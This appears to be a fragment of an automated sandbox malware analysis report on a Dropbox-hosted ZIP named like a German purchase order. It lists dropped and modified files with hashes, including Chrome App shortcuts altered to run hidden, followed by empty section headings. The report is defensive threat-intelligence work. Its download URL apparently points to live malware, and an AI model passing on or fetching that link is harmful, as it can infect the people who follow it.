C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzzfzdv0.0nx.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-25 04-17-18-363.log	ASCII text, with very long lines (393)	06DEAEDB81D09FD8FB5FF668D8E09CB2	28A02BCBD5975117B97A08AFB049F2C94F334726	D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log	ASCII text, with very long lines (393), with CRLF line terminators	8B1A467B7489A4FAF1673A1B144B1D0E	2F281E488ADAC3CF7038111C663A2350D8950593	E675DF5044EE58B6DD242D1EB2595F955C901D6AA78FA868CBD06F24C0572294
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt	ASCII text, with CRLF line terminators	90AD99A42417053C3CD1F1746995931A	35FC650305BF43C20A0AE0ED14DD31672D819956	78B405158E39BDB6FB22A8F92362508B19C72CD81DBDF083EB66096C780CCA92
C:\Users\user\AppData\Local\Temp\acrocef_low\03cadd97-da11-48f9-a9e0-e4ea0ea14d23.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022	5C48B0AD2FEF800949466AE872E1F1E2	337D617AE142815EDDACB48484628C1F16692A2F	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
C:\Users\user\AppData\Local\Temp\acrocef_low\7e8a73e8-c68e-4dee-bba4-7d718f4cc8f5.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142	0A347312E361322436D1AF1D5145D2AB	1D6C06A274705F8A295F62AD90CF8CA27555C226	094501B3CA4E93F626ABFCAE800645C533B61409DC3D1D233F4D053CE6A124D7
C:\Users\user\AppData\Local\Temp\acrocef_low\b72b951e-990d-45c7-9fa0-88d4c9dcbde5.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538	3EC2C067AFA666EDAC5AA95F54A87BD6	B01E28DCAFB20FFB40A2665BF5F70F56289FA183	E6F5BAEE634500BD5BC5795AAA29F8A006C5020201021329F35B751C90137A20
C:\Users\user\AppData\Local\Temp\acrocef_low\ff734dff-738b-4434-b791-19956e0299ef.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081	716C2C392DCD15C95BBD760EEBABFCD0	4B4CE9C6AED6A7F809236B2DAFA9987CA886E603	DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	3D6A2E5B9960A93EA3AAE9827C8845F9	80A3A8C894B83C76DA0A65D24A6115B943999450	E95A89E6351FF201A6EDA5621F66374D98BC215CED5B2FABB2CBC8A1AFBDC1CE
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	F10A844CCC65F0863134B4690BA5C78E	B723DEFBF5321A213112DD06965C132C4BE83BD1	9FB1048046087EE06A7B71F9F040B020A96C080C7CED290990DD5AD8D2DA763D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	CD5E3416F1C07B46F4BC2EBE782029F9	A2EA2E74A54CBFCE53AE25C5B28FC0D84ADC5D96	289EB0E1DE3FAA32F948043494F414655A3EEB72B72C15CC1046F376329FF312
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	C9C22E798B73DA7A034D944B0A3C51C3	7DAB0BB39AA0DDA0CBE47B4D97A27E9C0D20D75A	EE618BEDAB5F9129406F552DFB141C436F5FEB4EC80EFDF54431CAEF7E3F8CCF
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:45 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	1558430B33EC3F8E287FEC592A878EF0	3E589792F4A50D15F35D6CFF4F7F403A15D8EB59	DE0AE4BA8B8C4F167276E7EBE2EDB0C9EE5D6D9D7587D49876E231605BADEA07
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:15:44 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide	1DFA43C2BF63464795D233DE26B16DD2	0514772CDD71E730E861DD35619901396C5BFCB0	62CA0F3C246FE3CC63A68D9FA37BB82C07318F38AA6D768840BD21B8A72D60D1
C:\Users\user\Downloads\50e90ad8-c7e3-4c84-813c-786d849f4ee1.tmp	Zip archive data, at least v1.0 to extract, compression method=store	E81EF2F3006024904C21907F993A37F5	FEF4B2D6BF3368AC3E520B767D4560035DB69891	F7367128CFACFC41DAD0658218059741D42F952C0A6DB60A6A9C91E12BF21184
C:\Users\user\Downloads\BestellungVRG020002.zip (copy)	Zip archive data, at least v1.0 to extract, compression method=store	E81EF2F3006024904C21907F993A37F5	FEF4B2D6BF3368AC3E520B767D4560035DB69891	F7367128CFACFC41DAD0658218059741D42F952C0A6DB60A6A9C91E12BF21184
C:\Users\user\Downloads\BestellungVRG020002.zip.crdownload (copy)	Zip archive data, at least v1.0 to extract, compression method=store	E81EF2F3006024904C21907F993A37F5	FEF4B2D6BF3368AC3E520B767D4560035DB69891	F7367128CFACFC41DAD0658218059741D42F952C0A6DB60A6A9C91E12BF21184
C:\Users\user\Downloads\toto.zip	Zip archive data, at least v2.0 to extract, compression method=store	A6D6E25EDD413782287C7870716B136F	7FE14F2E69CD198C33522B1A36A4CAB53694D9D0	C00F9877A051581C3CF57B55945274AA6FB5F717E835FC6FCC390E7466481E5B
Chrome Cache Entry: 180	Zip archive data, at least v1.0 to extract, compression method=store	E81EF2F3006024904C21907F993A37F5	FEF4B2D6BF3368AC3E520B767D4560035DB69891	F7367128CFACFC41DAD0658218059741D42F952C0A6DB60A6A9C91E12BF21184
\Device\Null	ASCII text, with CRLF line terminators, with overstriking	1E2AC613338A8A1B2FAA866942CF7289	57BDF3D09C298EF7626707C60DFAC8E2E12B0405	D676A2AE7C46320E1591C41EFF3848BBC49C6CD99B9B95FE4E43D6126E2799AA

Windows Analysis Report https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0

Overview

General Information

Detection

Signatures

Classification

Signatures

Compliance

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0